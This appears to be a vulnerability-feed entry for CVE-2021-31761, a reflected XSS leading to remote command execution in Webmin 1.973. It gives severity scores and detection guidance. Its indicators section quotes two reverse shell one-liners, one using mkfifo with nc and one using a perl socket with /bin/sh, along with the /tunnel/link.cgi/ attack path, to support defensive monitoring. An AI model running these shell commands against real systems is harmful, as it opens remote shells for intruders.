CVE-2021-31761
published 2021-04-25

CVE-2021-31761: Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.

Priority: P262
Severity: critical, 9.6 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Exploit: available
EPSS: 33.57% (98.2th percentile)

Affected (1 range)

Vendor: webmin
Product: webmin
Version range: not listed
Fixed in: not listed

Detection & IOCs (extracted from sources)

path: /tunnel/link.cgi/
path: run.cgi
command: mkfifo /tmp/<rand>; nc <ip> <port> 0/tmp/<rand> 2>&1; rm /tmp/<rand>
command: perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Monitor HTTP requests to /tunnel/link.cgi/ containing URL-encoded HTML form payloads with document.forms[0].submit() — this is the CSRF delivery vector used to trigger RCE via the running process feature.
  • Alert on Webmin process spawning mkfifo, nc, python, perl, ruby, or php reverse shell one-liners as child processes — these are the five payload types generated by the exploit.
  • Detect creation of randomly-named named pipes (mkfifo) under /tmp/ followed immediately by nc execution — characteristic of the Bash reverse shell payload in this exploit.
  • The exploit delivers its CSRF payload as a URL-encoded string appended directly to /tunnel/link.cgi/; inspect GET/POST requests to this path for embedded HTML form tags and JavaScript history.pushState calls.
  • The attack targets Webmin's 'running process' feature to achieve RCE; monitor for unexpected command execution originating from the Webmin process (e.g., miniserv.pl spawning shells).
  • The exploit requires a Webmin administrator to click the crafted CSRF link; the attack chain is XSS → CSRF → RCE and will not succeed against non-admin sessions.
  • The exploit is confirmed against Webmin 1.973, but the author notes it was tested on 'All versions', so detection rules should not be scoped exclusively to version 1.973.

CVSS provenance

NVD, v3.1: 9.6 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
NVD, v2.0: 6.8 MEDIUM, AV:N/AC:M/Au:N/C:P/I:P/A:P